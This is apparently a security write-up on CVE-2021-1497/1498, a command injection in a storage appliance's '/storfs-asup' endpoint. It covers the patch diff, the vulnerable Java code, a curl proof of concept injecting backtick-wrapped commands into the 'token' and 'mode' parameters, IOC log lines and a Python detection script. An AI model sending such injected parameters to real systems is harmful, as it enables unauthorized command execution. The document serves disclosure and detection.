# CVE-2021-1497 and/or CVE-2021-1498
Command injection in the `/storfs-asup` endpoint’s `token` and `mode` parameters.
## Patch
```
--- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500
+++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500
@@ -69,17 +69,6 @@
</servlet-mapping>
<servlet>
- <servlet-name>Springpath Storfs ASUP</servlet-name>
- <servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>
- <load-on-startup>1</load-on-startup>
- </servlet>
-
- <servlet-mapping>
- <servlet-name>Springpath Storfs ASUP</servlet-name>
- <url-pattern>/storfs-asup/*</url-pattern>
- </servlet-mapping>
-
- <servlet>
<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>
<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>
</servlet>
```
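Review bot: The removed `<servlet>` / `<servlet-mapping>` pair for `Springpath Storfs ASUP` only unregisters `/storfs-asup/*` in web.xml; this diff gives no sign that `com.storvisor.sysmgmt.service.StorfsAsup` is dropped from the deployed archive or that its command handling changed. I would ask for confirmation that the class is removed as well (or is not reachable through any other mapping), and for a short comment or changelog entry recording why the servlet was unregistered, so it is not re-added later.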
## Vulnerability
```
protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    String action = request.getParameter("action");
    if (action == null) {
        String msg = "Action for the servlet need be specified.";
        writeErrorResponse(response, msg);
        return;
    }
    try {
        // "token" is read from the request and appended to the command string as-is.
        String token = request.getParameter("token");
        StringBuilder cmd = new StringBuilder();
        cmd.append("exec /bin/storfs-asup ");
        cmd.append(token);
        // "mode" is handled the same way: no validation, no quoting.
        String mode = request.getParameter("mode");
        cmd.append(" ");
        cmd.append(mode);
        cmd.append(" > /dev/null");
        logger.info("storfs-asup cmd to run : " + cmd);
        // The concatenated string is handed to bash -c, so shell syntax in either parameter is interpreted.
        ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() });
        logger.info("Starting the storfs-asup now: ");
        long startTime = System.currentTimeMillis();
        Process p = pb.start();
        InputStream errStream = p.getErrorStream();
        String errMsg = FileUtils.readToString(errStream);
        int exitCode = p.waitFor();
        long timeTaken = System.currentTimeMillis() - startTime;
        logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg);
        errStream.close();
        OutputStream outStream = p.getOutputStream();
        outStream.flush();
        outStream.close();
        if (exitCode != 0)
            throw new Exception(errMsg);
    } catch (IOException ex) {
        logger.error("Failed to generate asup: " + ex);
    } catch (Exception ie) {
        logger.error("Failed to run the /bin/storfs-asup command.");
    } finally {
        logger.info("Done executing asup command. ");
    }
}
```
## PoC
```
wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
* Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /storfs-asup HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 00:54:26 GMT
< Content-Length: 0
< Connection: keep-alive
< Front-End-Https: on
<
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$
```
## IOCs
```
==> /var/log/nginx/access.log <==
192.168.123.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1"
==> /var/log/springpath/stBootstrapGuiBackend.log <==
2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null
2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.
==> /var/log/tomcat7/catalina.out <==
2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null
2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.
==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==
127.0.0.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 -
```
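A log check for the IOC pattern above, as an added example that is not part of the original write-up: it parses the `storfs-asup cmd to run` lines shown in the IOCs and flags any whose arguments are not two plain words, reporting each event once even though it is logged in both files. The plain-word pattern, the metacharacter set and the third sample line are assumptions constructed for illustration.

```python
import re

# Message format taken from the IOC log samples above; it appears in both
# stBootstrapGuiBackend.log and catalina.out.
MARKER = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}-\d{2}:\d{2}:\d{2}\.\d{3}) .*?"
    r"storfs-asup cmd to run : exec /bin/storfs-asup (?P<rest>.*)$"
)
SUFFIX = " > /dev/null"
# Assumption: legitimate token and mode values are single plain words.
PLAIN_WORD = re.compile(r"^[A-Za-z0-9._=-]+$")
SHELL_META = set("`$;|&<>(){}[]\\'\"*?~!#")

def inspect_line(line):
    """Return a finding dict for a storfs-asup command log line, else None."""
    m = MARKER.match(line.rstrip("\r\n"))
    if m is None:
        return None
    rest = m.group("rest")
    # The servlet always appends the redirect; if it is missing, the logged
    # command was split across lines (an embedded newline in a parameter).
    truncated = not rest.endswith(SUFFIX)
    args = rest if truncated else rest[: -len(SUFFIX)]
    words = args.split(" ")
    plain = len(words) == 2 and all(PLAIN_WORD.match(w) for w in words)
    return {
        "timestamp": m.group("ts"),
        "args": args,
        "metachars": sorted(set(args) & SHELL_META),
        "suspicious": truncated or not plain,
    }

def scan(lines):
    """Inspect every line; report each suspicious (timestamp, args) once."""
    seen, findings = set(), []
    for line in lines:
        f = inspect_line(line)
        if f and f["suspicious"] and (f["timestamp"], f["args"]) not in seen:
            seen.add((f["timestamp"], f["args"]))
            findings.append(f)
    return findings

SAMPLE = [
    # First two lines are the page's IOC samples; the third is constructed.
    "2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null",
    "2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null",
    "2021-05-18-01:02:03.004 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup abc123 full > /dev/null",
]
```

Calling `scan(SAMPLE)` yields a single finding for the backtick-wrapped arguments; on a real appliance, feed it the lines of the two log files named in the IOCs.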